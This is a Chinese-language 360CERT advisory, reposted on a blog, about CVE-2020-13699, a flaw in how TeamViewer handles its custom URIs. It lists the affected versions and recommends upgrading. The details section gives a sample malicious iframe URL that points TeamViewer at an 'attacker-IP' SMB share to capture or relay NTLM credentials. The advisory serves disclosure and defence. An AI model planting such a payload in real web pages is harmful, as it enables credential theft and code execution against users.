CVE-2020-13699: TeamViewer 用户密码破解漏洞通告

360CERT [三六零CERT](javascript:void(0)😉 昨天

img

报告编号:B6-2020-081002

报告来源:360CERT

报告作者:360CERT

更新日期:2020-08-10

0x01 漏洞简述

2020年08月10日,360CERT监测发现TeamViewer官方发布了TeamViewerURL处理的风险通告,该漏洞编号为CVE-2020-13699,漏洞等级:高危,漏洞评分:8.8分
TeamViewer存在未引用的搜索路径或元素的安全缺陷,更具体地说,这是由于应用程序没有正确引用它的自定义URI处理程序,当安装了TeamViewer的易受攻击版本的用户访问恶意创建的网站时,可能会被黑客利用。

对此,360CERT建议广大用户及时将TeamViewer升级到15.8.3版本。与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。

0x02 风险等级

360CERT对该漏洞的评定结果如下

评定方式 等级
威胁等级 高危
影响面 广泛
360CERT评分 8.8分

0x03 漏洞详情

TeamViewer主要用于远程访问和控制各种类型的计算机系统和移动设备,但也提供协作和演示功能(例如,桌面共享、网络会议、文件传输等)。

TeamViewer存在未引用的搜索路径或元素的安全缺陷,更具体地说,这是由于应用程序没有正确引用它的自定义URI处理程序,当安装了TeamViewer的易受攻击版本的系统访问恶意创建的网站时,可能会被利用,攻击者可以使用精心制作的URL(iframesrc='teamviewer10:--play\\attacker-IP\share\fake.tvs')将恶意iframe嵌入网站中,这将启动TeamViewerWindows桌面客户端并强制其执行以下操作:打开远程SMB共享。Windows在打开SMB共享时将执行NTLM身份验证,并且可以将请求进行转发(使用诸如响应程序之类的工具)以执行代码(或捕获以进行哈希破解)。

0x04 影响版本

TeamViewer<8.0.258861
TeamViewer<9.0.28860
TeamViewer<10.0.258873
TeamViewer<11.0.258870
TeamViewer<12.0.258869
TeamViewer<13.2.36220
TeamViewer<14.2.56676
TeamViewer<15.8.3

0x05 修复建议

通用修补建议:

升级到15.8.3版本,下载地址为:

Previous TeamViewer versions 10 – 11 – 12 – 13 – 14

https://www.teamviewer.com/en/download/previous-versions/

0x06 相关空间测绘数据

360安全大脑-Quake网络空间测绘系统通过对全网资产测绘,发现TeamViewer全球均有广泛使用,具体分布如下图所示。

img

0x07 产品侧解决方案

360城市级网络安全监测服务

360安全大脑的QUAKE资产测绘平台通过资产测绘技术手段,对该类漏洞进行监测,请用户联系相关产品区域负责人或(quake#360.cn)获取对应产品。

img

0x08 时间线

2020-08-06 TeamViewer发布通告

2020-08-10 360CERT发布通告

0x09 参考链接

1、 Statement on CVE 2020-13699

https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448

2、 TeamViewer flaw could be exploited to crack users’ password

https://www.helpnetsecurity.com/2020/08/06/cve-2020-13699/

转载自https://mp.weixin.qq.com/s/QEbfOFylZs3vUvf_ZY5X8g

©️2020 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值